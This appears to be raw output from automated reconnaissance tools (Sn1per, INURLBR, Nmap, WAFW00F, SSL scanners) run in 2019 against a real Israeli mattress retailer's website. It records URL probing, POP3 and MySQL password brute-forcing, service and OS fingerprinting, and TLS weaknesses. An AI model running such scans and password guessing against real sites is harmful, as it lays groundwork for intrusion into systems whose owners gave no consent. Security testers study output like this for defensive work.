  1923. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1924. |_[ + ] More details:: / - / , ISP:
  1925. |_[ + ] Found:: UNIDENTIFIED
  1926.  
  1927. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1928. |_[ + ] [ 74 / 100 ]-[04:34:05] [ - ]
  1929. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-צורית ]
  1930. |_[ + ] Exploit::
  1931. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1932. |_[ + ] More details:: / - / , ISP:
  1933. |_[ + ] Found:: UNIDENTIFIED
  1934.  
  1935. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1936. |_[ + ] [ 75 / 100 ]-[04:34:07] [ - ]
  1937. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-מבקיעים ]
  1938. |_[ + ] Exploit::
  1939. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1940. |_[ + ] More details:: / - / , ISP:
  1941. |_[ + ] Found:: UNIDENTIFIED
  1942.  
  1943. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1944. |_[ + ] [ 76 / 100 ]-[04:34:09] [ - ]
  1945. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-בחלמיש ]
  1946. |_[ + ] Exploit::
  1947. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1948. |_[ + ] More details:: / - / , ISP:
  1949. |_[ + ] Found:: UNIDENTIFIED
  1950.  
  1951. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1952. |_[ + ] [ 77 / 100 ]-[04:34:11] [ - ]
  1953. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-ברטעה ]
  1954. |_[ + ] Exploit::
  1955. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1956. |_[ + ] More details:: / - / , ISP:
  1957. |_[ + ] Found:: UNIDENTIFIED
  1958.  
  1959. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1960. |_[ + ] [ 78 / 100 ]-[04:34:14] [ - ]
  1961. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-כרכור ]
  1962. |_[ + ] Exploit::
  1963. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1964. |_[ + ] More details:: / - / , ISP:
  1965. |_[ + ] Found:: UNIDENTIFIED
  1966.  
  1967. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1968. |_[ + ] [ 79 / 100 ]-[04:34:16] [ - ]
  1969. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-איתמר ]
  1970. |_[ + ] Exploit::
  1971. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1972. |_[ + ] More details:: / - / , ISP:
  1973. |_[ + ] Found:: UNIDENTIFIED
  1974.  
  1975. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1976. |_[ + ] [ 80 / 100 ]-[04:34:18] [ - ]
  1977. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרונים-ביזרעם ]
  1978. |_[ + ] Exploit::
  1979. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1980. |_[ + ] More details:: / - / , ISP:
  1981. |_[ + ] Found:: UNIDENTIFIED
  1982.  
  1983. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1984. |_[ + ] [ 81 / 100 ]-[04:34:21] [ - ]
  1985. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-דקים-באדורה ]
  1986. |_[ + ] Exploit::
  1987. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1988. |_[ + ] More details:: / - / , ISP:
  1989. |_[ + ] Found:: UNIDENTIFIED
  1990.  
  1991. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1992. |_[ + ] [ 82 / 100 ]-[04:34:23] [ - ]
  1993. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-אחיסמך ]
  1994. |_[ + ] Exploit::
  1995. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  1996. |_[ + ] More details:: / - / , ISP:
  1997. |_[ + ] Found:: UNIDENTIFIED
  1998.  
  1999. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2000. |_[ + ] [ 83 / 100 ]-[04:34:25] [ - ]
  2001. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-דקים-באמונים ]
  2002. |_[ + ] Exploit::
  2003. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2004. |_[ + ] More details:: / - / , ISP:
  2005. |_[ + ] Found:: UNIDENTIFIED
  2006.  
  2007. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2008. |_[ + ] [ 84 / 100 ]-[04:34:27] [ - ]
  2009. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-בלימן ]
  2010. |_[ + ] Exploit::
  2011. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2012. |_[ + ] More details:: / - / , ISP:
  2013. |_[ + ] Found:: UNIDENTIFIED
  2014.  
  2015. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2016. |_[ + ] [ 85 / 100 ]-[04:34:29] [ - ]
  2017. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-באלעזר ]
  2018. |_[ + ] Exploit::
  2019. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2020. |_[ + ] More details:: / - / , ISP:
  2021. |_[ + ] Found:: UNIDENTIFIED
  2022.  
  2023. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2024. |_[ + ] [ 86 / 100 ]-[04:34:31] [ - ]
  2025. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-באריאל ]
  2026. |_[ + ] Exploit::
  2027. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2028. |_[ + ] More details:: / - / , ISP:
  2029. |_[ + ] Found:: UNIDENTIFIED
  2030.  
  2031. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2032. |_[ + ] [ 87 / 100 ]-[04:34:33] [ - ]
  2033. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-עודפים-במכמורת ]
  2034. |_[ + ] Exploit::
  2035. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2036. |_[ + ] More details:: / - / , ISP:
  2037. |_[ + ] Found:: UNIDENTIFIED
  2038.  
  2039. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2040. |_[ + ] [ 88 / 100 ]-[04:34:36] [ - ]
  2041. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-נוחים-באדמית ]
  2042. |_[ + ] Exploit::
  2043. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2044. |_[ + ] More details:: / - / , ISP:
  2045. |_[ + ] Found:: UNIDENTIFIED
  2046.  
  2047. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2048. |_[ + ] [ 89 / 100 ]-[04:34:38] [ - ]
  2049. |_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-בנגה ]
  2050. |_[ + ] Exploit::
  2051. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2052. |_[ + ] More details:: / - / , ISP:
  2053. |_[ + ] Found:: UNIDENTIFIED
  2054.  
  2055. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2056. |_[ + ] [ 90 / 100 ]-[04:34:40] [ - ]
  2057. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-קטנים-באעצם ]
  2058. |_[ + ] Exploit::
  2059. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2060. |_[ + ] More details:: / - / , ISP:
  2061. |_[ + ] Found:: UNIDENTIFIED
  2062.  
  2063. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2064. |_[ + ] [ 91 / 100 ]-[04:34:42] [ - ]
  2065. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-טובים-במגן ]
  2066. |_[ + ] Exploit::
  2067. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2068. |_[ + ] More details:: / - / , ISP:
  2069. |_[ + ] Found:: UNIDENTIFIED
  2070.  
  2071. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2072. |_[ + ] [ 92 / 100 ]-[04:34:44] [ - ]
  2073. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרנים-במבצע-אפיק ]
  2074. |_[ + ] Exploit::
  2075. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2076. |_[ + ] More details:: / - / , ISP:
  2077. |_[ + ] Found:: UNIDENTIFIED
  2078.  
  2079. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2080. |_[ + ] [ 93 / 100 ]-[04:34:46] [ - ]
  2081. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-לילדים-באשקלון ]
  2082. |_[ + ] Exploit::
  2083. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2084. |_[ + ] More details:: / - / , ISP:
  2085. |_[ + ] Found:: UNIDENTIFIED
  2086.  
  2087. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2088. |_[ + ] [ 94 / 100 ]-[04:34:49] [ - ]
  2089. |_[ + ] Target:: [ http://babylon-woodline.co.il/חנות-מזרנים-פquotת ]
  2090. |_[ + ] Exploit::
  2091. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2092. |_[ + ] More details:: / - / , ISP:
  2093. |_[ + ] Found:: UNIDENTIFIED
  2094.  
  2095. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2096. |_[ + ] [ 95 / 100 ]-[04:34:51] [ - ]
  2097. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-קצרין ]
  2098. |_[ + ] Exploit::
  2099. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2100. |_[ + ] More details:: / - / , ISP:
  2101. |_[ + ] Found:: UNIDENTIFIED
  2102.  
  2103. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2104. |_[ + ] [ 96 / 100 ]-[04:34:53] [ - ]
  2105. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-יוקרתיים-בגלילות ]
  2106. |_[ + ] Exploit::
  2107. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2108. |_[ + ] More details:: / - / , ISP:
  2109. |_[ + ] Found:: UNIDENTIFIED
  2110.  
  2111. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2112. |_[ + ] [ 97 / 100 ]-[04:34:55] [ - ]
  2113. |_[ + ] Target:: [ http://babylon-woodline.co.il/קניית-מזרונים-חיפה ]
  2114. |_[ + ] Exploit::
  2115. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2116. |_[ + ] More details:: / - / , ISP:
  2117. |_[ + ] Found:: UNIDENTIFIED
  2118.  
  2119. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2120. |_[ + ] [ 98 / 100 ]-[04:34:57] [ - ]
  2121. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-גבוהים-בחורפיש ]
  2122. |_[ + ] Exploit::
  2123. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2124. |_[ + ] More details:: / - / , ISP:
  2125. |_[ + ] Found:: UNIDENTIFIED
  2126.  
  2127. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2128. |_[ + ] [ 99 / 100 ]-[04:35:00] [ - ]
  2129. |_[ + ] Target:: [ http://babylon-woodline.co.il/מזרונים-ומיטות-בסכנין ]
  2130. |_[ + ] Exploit::
  2131. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
  2132. |_[ + ] More details:: / - / , ISP:
  2133. |_[ + ] Found:: UNIDENTIFIED
  2134.  
  2135. [ INFO ] [ Shutting down ]
  2136. [ INFO ] [ End of process INURLBR at [23-01-2019 04:35:00]
  2137. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  2138. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-babylon-woodline.co.il ]
  2139. |_________________________________________________________________________________________
  2140.  
  2141. \_________________________________________________________________________________________/
  2142. #######################################################################################################################################
  2143. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:35 EST
  2144. NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
  2145. NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
  2146. NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
  2147. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  2148. Host is up (0.23s latency).
  2149. rDNS record for 62.90.134.182: server.webid.co.il
  2150.  
  2151. PORT STATE SERVICE VERSION
  2152. 110/tcp open pop3 Dovecot DirectAdmin pop3d
  2153. | pop3-brute:
  2154. | Accounts: No valid accounts found
  2155. |_ Statistics: Performed 205 guesses in 183 seconds, average tps: 1.0
  2156. |_pop3-capabilities: STLS PIPELINING TOP CAPA USER SASL(PLAIN) AUTH-RESP-CODE RESP-CODES UIDL
  2157. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2158. Device type: general purpose|firewall|storage-misc|VoIP phone
  2159. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  2160. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  2161. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.10 (89%), Linux 3.4 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  2162. No exact OS matches for host (test conditions non-ideal).
  2163. Network Distance: 17 hops
  2164.  
  2165. TRACEROUTE (using port 110/tcp)
  2166. HOP RTT ADDRESS
  2167. 1 144.29 ms 10.246.200.1
  2168. 2 144.46 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  2169. 3 144.33 ms 176.10.83.34
  2170. 4 144.34 ms sfia-b2-link.telia.net (62.115.148.144)
  2171. 5 177.54 ms prag-bb1-link.telia.net (62.115.119.72)
  2172. 6 176.93 ms ffm-bb4-link.telia.net (62.115.133.79)
  2173. 7 188.63 ms ffm-b1-link.telia.net (62.115.121.3)
  2174. 8 179.30 ms 80.239.196.190
  2175. 9 ...
  2176. 10 230.41 ms gw2-3-1-4-hfa-gw2-fra.nv.net.il (212.143.12.76)
  2177. 11 229.99 ms 212.143.7.39
  2178. 12 231.18 ms core1-rha2-0-0-core1-hfa.nv.net.il (207.232.0.17)
  2179. 13 232.71 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
  2180. 14 234.61 ms 212.143.201.190
  2181. 15 230.49 ms 82-166-37-254.barak-online.net (82.166.37.254)
  2182. 16 232.03 ms 62-90-134-178.barak.net.il (62.90.134.178)
  2183. 17 232.06 ms server.webid.co.il (62.90.134.182)
  2184. #######################################################################################################################################
  2185.  
  2186. ^ ^
  2187. _ __ _ ____ _ __ _ _ ____
  2188. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2189. | V V // o // _/ | V V // 0 // 0 // _/
  2190. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2191. <
  2192. ...'
  2193.  
  2194. WAFW00F - Web Application Firewall Detection Tool
  2195.  
  2196. By Sandro Gauci && Wendel G. Henrique
  2197.  
  2198. Checking https://babylon-woodline.co.il
  2199. Generic Detection results:
  2200. No WAF detected by the generic detection
  2201. Number of requests: 14
  2202. #######################################################################################################################################
  2203. https://babylon-woodline.co.il [200 OK] Country[ISRAEL][IL], HTTPServer[nginx], IP[62.90.134.182], Title[Secured Home of babylon-woodline.co.il], UncommonHeaders[x-accel-version], nginx
  2204. #######################################################################################################################################
  2205.  
  2206.  
  2207.  
  2208. AVAILABLE PLUGINS
  2209. -----------------
  2210.  
  2211. PluginChromeSha1Deprecation
  2212. PluginHSTS
  2213. PluginSessionRenegotiation
  2214. PluginHeartbleed
  2215. PluginCertInfo
  2216. PluginOpenSSLCipherSuites
  2217. PluginCompression
  2218. PluginSessionResumption
  2219.  
  2220.  
  2221.  
  2222. CHECKING HOST(S) AVAILABILITY
  2223. -----------------------------
  2224.  
  2225. babylon-woodline.co.il:443 => 62.90.134.182:443
  2226.  
  2227.  
  2228.  
  2229. SCAN RESULTS FOR BABYLON-WOODLINE.CO.IL:443 - 62.90.134.182:443
  2230. ---------------------------------------------------------------
  2231.  
  2232. * Deflate Compression:
  2233. OK - Compression disabled
  2234.  
  2235. * Session Renegotiation:
  2236. Client-initiated Renegotiations: OK - Rejected
  2237. Secure Renegotiation: OK - Supported
  2238.  
  2239. * OpenSSL Heartbleed:
  2240. OK - Not vulnerable to Heartbleed
  2241.  
  2242. * Certificate - Content:
  2243. SHA1 Fingerprint: 2e3f643e5d11a459bd85ab36e5e5593f04c8e51f
  2244. Common Name: localhost
  2245. Issuer: localhost
  2246. Serial Number: 99F758FFACDEEDCB
  2247. Not Before: Sep 20 10:18:07 2014 GMT
  2248. Not After: Feb 4 10:18:07 2042 GMT
  2249. Signature Algorithm: sha1WithRSAEncryption
  2250. Public Key Algorithm: rsaEncryption
  2251. Key Size: 2048 bit
  2252. Exponent: 65537 (0x10001)
  2253.  
  2254. * Certificate - Trust:
  2255. Hostname Validation: FAILED - Certificate does NOT match babylon-woodline.co.il
  2256. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  2257. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
  2258. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  2259. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  2260. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
  2261. Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
  2262.  
  2263. * Certificate - OCSP Stapling:
  2264. NOT SUPPORTED - Server did not send back an OCSP response.
  2265.  
  2266. * SSLV2 Cipher Suites:
  2267. Server rejected all cipher suites.
  2268.  
  2269. * Session Resumption:
  2270. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2271. With TLS Session Tickets: OK - Supported
  2272.  
  2273. * TLSV1_2 Cipher Suites:
  2274. Preferred:
  2275. ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
  2276. Accepted:
  2277. ECDHE-RSA-AES256-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
  2278. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
  2279. ECDHE-RSA-AES256-GCM-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
  2280. DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
  2281. DHE-RSA-AES256-SHA256 DH-2048 bits 256 bits HTTP 200 OK
  2282. DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
  2283. DHE-RSA-AES256-GCM-SHA384 DH-2048 bits 256 bits HTTP 200 OK
  2284. CAMELLIA256-SHA - 256 bits HTTP 200 OK
  2285. AES256-SHA256 - 256 bits HTTP 200 OK
  2286. AES256-SHA - 256 bits HTTP 200 OK
  2287. AES256-GCM-SHA384 - 256 bits HTTP 200 OK
  2288. ECDHE-RSA-AES128-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
  2289. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  2290. ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
  2291. DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
  2292. DHE-RSA-AES128-SHA256 DH-2048 bits 128 bits HTTP 200 OK
  2293. DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
  2294. DHE-RSA-AES128-GCM-SHA256 DH-2048 bits 128 bits HTTP 200 OK
  2295. CAMELLIA128-SHA - 128 bits HTTP 200 OK
  2296. AES128-SHA256 - 128 bits HTTP 200 OK
  2297. AES128-SHA - 128 bits HTTP 200 OK
  2298. AES128-GCM-SHA256 - 128 bits HTTP 200 OK
  2299. ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
  2300. DES-CBC3-SHA - 112 bits HTTP 200 OK
  2301.  
  2302. * TLSV1_1 Cipher Suites:
  2303. Preferred:
  2304. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  2305. Accepted:
  2306. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
  2307. DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
  2308. DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
  2309. CAMELLIA256-SHA - 256 bits HTTP 200 OK
  2310. AES256-SHA - 256 bits HTTP 200 OK
  2311. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  2312. DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
  2313. DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
  2314. CAMELLIA128-SHA - 128 bits HTTP 200 OK
  2315. AES128-SHA - 128 bits HTTP 200 OK
  2316. ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
  2317. DES-CBC3-SHA - 112 bits HTTP 200 OK
  2318.  
  2319. * TLSV1 Cipher Suites:
  2320. Preferred:
  2321. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  2322. Accepted:
  2323. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
  2324. DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
  2325. DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
  2326. CAMELLIA256-SHA - 256 bits HTTP 200 OK
  2327. AES256-SHA - 256 bits HTTP 200 OK
  2328. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
  2329. DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
  2330. DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
  2331. CAMELLIA128-SHA - 128 bits HTTP 200 OK
  2332. AES128-SHA - 128 bits HTTP 200 OK
  2333. ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
  2334. DES-CBC3-SHA - 112 bits HTTP 200 OK
  2335.  
  2336. * SSLV3 Cipher Suites:
  2337. Server rejected all cipher suites.
  2338.  
  2339.  
  2340.  
  2341. SCAN COMPLETED IN 19.40 S
  2342. -------------------------
  2343. Version: 1.11.12-static
  2344. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2345.  
  2346. Connected to 62.90.134.182
  2347.  
  2348. Testing SSL server babylon-woodline.co.il on port 443 using SNI name babylon-woodline.co.il
  2349.  
  2350. TLS Fallback SCSV:
  2351. Server supports TLS Fallback SCSV
  2352.  
  2353. TLS renegotiation:
  2354. Secure session renegotiation supported
  2355.  
  2356. TLS Compression:
  2357. Compression disabled
  2358.  
  2359. Heartbleed:
  2360. TLS 1.2 not vulnerable to heartbleed
  2361. TLS 1.1 not vulnerable to heartbleed
  2362. TLS 1.0 not vulnerable to heartbleed
  2363.  
  2364. Supported Server Cipher(s):
  2365. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2366. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2367. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  2368. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  2369. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  2370. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2371. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  2372. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2373. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  2374. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  2375. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  2376. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  2377. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2378. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  2379. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  2380. Accepted TLSv1.2 128 bits AES128-SHA256
  2381. Accepted TLSv1.2 256 bits AES256-SHA256
  2382. Accepted TLSv1.2 128 bits AES128-SHA
  2383. Accepted TLSv1.2 256 bits AES256-SHA
  2384. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  2385. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  2386. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  2387. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  2388. Accepted TLSv1.2 112 bits DES-CBC3-SHA
  2389. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2390. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2391. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  2392. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  2393. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2394. Accepted TLSv1.1 128 bits AES128-SHA
  2395. Accepted TLSv1.1 256 bits AES256-SHA
  2396. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  2397. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  2398. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  2399. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  2400. Accepted TLSv1.1 112 bits DES-CBC3-SHA
  2401. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2402. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2403. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  2404. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  2405. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2406. Accepted TLSv1.0 128 bits AES128-SHA
  2407. Accepted TLSv1.0 256 bits AES256-SHA
  2408. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  2409. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  2410. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  2411. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  2412. Accepted TLSv1.0 112 bits DES-CBC3-SHA
  2413.  
  2414. SSL Certificate:
  2415. Signature Algorithm: sha1WithRSAEncryption
  2416. RSA Key Strength: 2048
  2417.  
  2418. Subject: localhost
  2419. Issuer: localhost
  2420.  
  2421. Not valid before: Sep 20 10:18:07 2014 GMT
  2422. Not valid after: Feb 4 10:18:07 2042 GMT
  2423. #######################################################################################################################################
  2424. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:40 EST
  2425. NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
  2426. NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
  2427. NSE: [mysql-brute] passwords: Time limit 10m00s exceeded.
  2428. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  2429. Host is up (0.23s latency).
  2430. rDNS record for 62.90.134.182: server.webid.co.il
  2431.  
  2432. PORT STATE SERVICE VERSION
  2433. 3306/tcp open mysql MySQL 5.5.60-MariaDB
